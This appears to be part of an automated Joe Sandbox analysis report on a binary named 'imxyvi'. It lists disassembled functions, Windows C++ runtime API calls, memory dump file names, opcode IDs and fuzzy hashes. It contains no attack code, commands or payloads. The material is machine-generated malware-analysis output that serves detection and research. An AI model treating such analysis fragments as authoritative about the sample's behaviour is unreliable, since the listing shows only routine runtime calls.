                                                                                                                                                                                                                                                                                      • Instruction ID: 65bb9842f322f960694f17c282e5fdde87f05b48f21366acf2f3a0360c4d93e3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44ba41bed6653be0007f28916185984c70f8e26d81552fa844fb2e3913a512cf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66418332A05A8187E7148F25E49116EF7A0FB88B94B248135EB8EC7755DF3CE895C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A953114E
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A953115C
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A9531195
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A953119F
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,00007FF6A952EA0B,?,?,?,?,?,00007FF6A9511B57), ref: 00007FF6A95311AD
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A95311DF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b660affaa016d667aa66e4f94833713e429caac14d962665b83b28a96be63055
                                                                                                                                                                                                                                                                                      • Instruction ID: ea34804bd46f2b3990162d9739fc26d907e4410f2d7c8e67cf44b8035c0a685e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b660affaa016d667aa66e4f94833713e429caac14d962665b83b28a96be63055
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1841F462F0AB4281EE109F32A4663BBE351AB04BD4F644632DE6DCB7C6DE3CD1418304
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF6A952E080
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A968: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6A95318F5), ref: 00007FF6A953A982
                                                                                                                                                                                                                                                                                      • ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF6A952E0D6
                                                                                                                                                                                                                                                                                      • ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF6A952E0F2
                                                                                                                                                                                                                                                                                      • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6A952E102
                                                                                                                                                                                                                                                                                      • ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF6A952E111
                                                                                                                                                                                                                                                                                      • ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF6A952E125
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@_Yarn@malloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3292048638-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 326cf4759ee2bb807352365aaaccce8e92807471e3969cf8fd574821c11d2a54
                                                                                                                                                                                                                                                                                      • Instruction ID: 0775e85248ce9a6f5139e3a6fd4395952c092a0f68bfd82930bebe78bd0bfe68
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 326cf4759ee2bb807352365aaaccce8e92807471e3969cf8fd574821c11d2a54
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9311F32A05B4183EB219F66F55426AB7A4FB89F80F648135CB8E83B60DF3CE095C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140 ref: 00007FF6A953A1D2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A968: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6A95318F5), ref: 00007FF6A953A982
                                                                                                                                                                                                                                                                                      • ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD@Z.MSVCP140 ref: 00007FF6A953A1EC
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A953A2A3
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6A953A2E1
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A953A30B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$?tolower@?$ctype@Concurrency::cancel_current_taskD@std@@mallocmemcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4246367773-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 706b376108a155f75b6b9f0fcac1c4640278eaed8725dfc3dd64674ec5505db3
                                                                                                                                                                                                                                                                                      • Instruction ID: 52ece691ea45a3466cea10fd1e033bb550126c5eb9c73663fd742a39bd2dd60e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 706b376108a155f75b6b9f0fcac1c4640278eaed8725dfc3dd64674ec5505db3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15519F62F16A8584FB008FB6D5563BE7361AB44BE8F204635DE6DA7BD9DF38D0818340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2542180945-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: 4c1ebe9c889d1e24800d80439ee52151d95b01ed3f2a35e328354efeca4202be
                                                                                                                                                                                                                                                                                      • Instruction ID: 73d89e364f260733389181ba3bffa66266c35d98f5caf2882a42dd6584dc75b6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c1ebe9c889d1e24800d80439ee52151d95b01ed3f2a35e328354efeca4202be
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0F437A0AB84CAC7159F32E8921AC7364F748B88F699231FB4D87755CF38D8908700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ?tolower@?$ctype@D@std@@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1228470278-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7af4fcc5996c1f0a7872814fd0a4069e5210d01e4d6592624c1c57498449afb8
                                                                                                                                                                                                                                                                                      • Instruction ID: 4c47550595eb4bd52943457624a9bb5bb145e6f77761e74c5cba24509f03dd04
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7af4fcc5996c1f0a7872814fd0a4069e5210d01e4d6592624c1c57498449afb8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEC1D822A0AB9185EB548F36C46237AB7A1EF95B84F248136DB8DC7396DF3DD495C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2138705365-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ec470a77b1fa5836db0abaf0a866b6d511d65f451efe17d2563e04f402c7661
                                                                                                                                                                                                                                                                                      • Instruction ID: 251550e4ec0303470893b50746471502aea0a08650d7720ccf3f96ee888fa86b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ec470a77b1fa5836db0abaf0a866b6d511d65f451efe17d2563e04f402c7661
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E981DF72A06B8691EB04DF29E4953AD7361FB45F88FA08032D74D87A69EF78D8D5C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A95112FB), ref: 00007FF6A9531483
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A95112FB), ref: 00007FF6A95314D6
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A95112FB), ref: 00007FF6A95314E0
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A953152C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dd1099b7ccacf3125fbd44e19650b013223462ebf52cb459487f8207b23b629d
                                                                                                                                                                                                                                                                                      • Instruction ID: 1b7759c295bf06980cf2e6b3b1c2dfdde55e9026c51d7b40af8ec37c6fe09d5c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd1099b7ccacf3125fbd44e19650b013223462ebf52cb459487f8207b23b629d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F041C062F06A4191EE10DF35A1A517EA391BB45BE4FA44731DA6DC7BD5EE3CE046C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6A95128E6), ref: 00007FF6A952EB92
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A968: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6A95318F5), ref: 00007FF6A953A982
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A95118F0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FF6A95312E5,?,?,?,?,00007FF6A95112FB), ref: 00007FF6A95118FB
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,00007FF6A95128E6), ref: 00007FF6A952EBB3
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A952EBCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9511850: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A95312EB), ref: 00007FF6A9511894
                                                                                                                                                                                                                                                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6A95128E6), ref: 00007FF6A952EC41
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??1?$basic_streambuf@Concurrency::cancel_current_taskD@std@@@std@@U?$char_traits@Xlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 676814534-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2b83914892f7c72d2639c601d322deba26f6a7a7aeb3e87586f4b31f46b7fb5e
                                                                                                                                                                                                                                                                                      • Instruction ID: 6ec71d333d2146bd56ed9246323b13347bdb95ddc213c49ce25a0795981aafbf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b83914892f7c72d2639c601d322deba26f6a7a7aeb3e87586f4b31f46b7fb5e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D341C332A06B4281EB159F2AE4523796394EB44FA4F348231DA6DC77D5DE3CD496C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpymemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 268977704-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e19c249194e36fb500a933f132ab5d6b481c140fd8ac7887f9e4cb476520a613
                                                                                                                                                                                                                                                                                      • Instruction ID: fcce2e71ee151ce88c2a9f819cc56f7068e7ec448c63328a32be36e61f738c2b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e19c249194e36fb500a933f132ab5d6b481c140fd8ac7887f9e4cb476520a613
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C41E262F0AA4181EE10DF32A4523BAE395EB49BD4F684635DE5DCB795DE3CE042C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00007FF6A9534527), ref: 00007FF6A9538EBE
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00007FF6A9534527), ref: 00007FF6A9538EEC
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00007FF6A9534527), ref: 00007FF6A9538F55
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953A968: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6A95318F5), ref: 00007FF6A953A982
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A9538F62
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmallocmemcpymemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2942768764-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f79c0c8236976be5bfaa2918f1e40d2456574babe77cfca1b26b90e732424b69
                                                                                                                                                                                                                                                                                      • Instruction ID: c94eeb15a584989fc1dfd1e53d046ed985a7381014ba6e488190719ff839d8e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f79c0c8236976be5bfaa2918f1e40d2456574babe77cfca1b26b90e732424b69
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E341AE66B06A8586EE1C8F35D0662BEB361BB44BA0F648635DB6DCB7D4DF3CE0558300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmallocmemcpymemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2942768764-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bd1946bb67de4f03be64c969cf4fb5d35477a0f217329cc02e5f30eb6d718630
                                                                                                                                                                                                                                                                                      • Instruction ID: 07b5dbbbf7626f43b781762bd1c029fc4a9bb8c864950c97d2157de689ade0ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd1946bb67de4f03be64c969cf4fb5d35477a0f217329cc02e5f30eb6d718630
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1931C262B06A8685ED04DF7595262BEA391EB44BE0F398631CA6DD77D5DE6CE042C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d5d6f7ec44ba26b9457277de841ffa6640d0fa53b334a5524b674738dffdd352
                                                                                                                                                                                                                                                                                      • Instruction ID: a5c188b026165f70c81f6a3f2e5a44fc6b14be4c3e7ed42a3a2f21c28193396b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5d6f7ec44ba26b9457277de841ffa6640d0fa53b334a5524b674738dffdd352
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F31D322F0A78285EE109F72A59536EE355AB05BE4F288635DE6DCBBD5DE7CE041C300
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
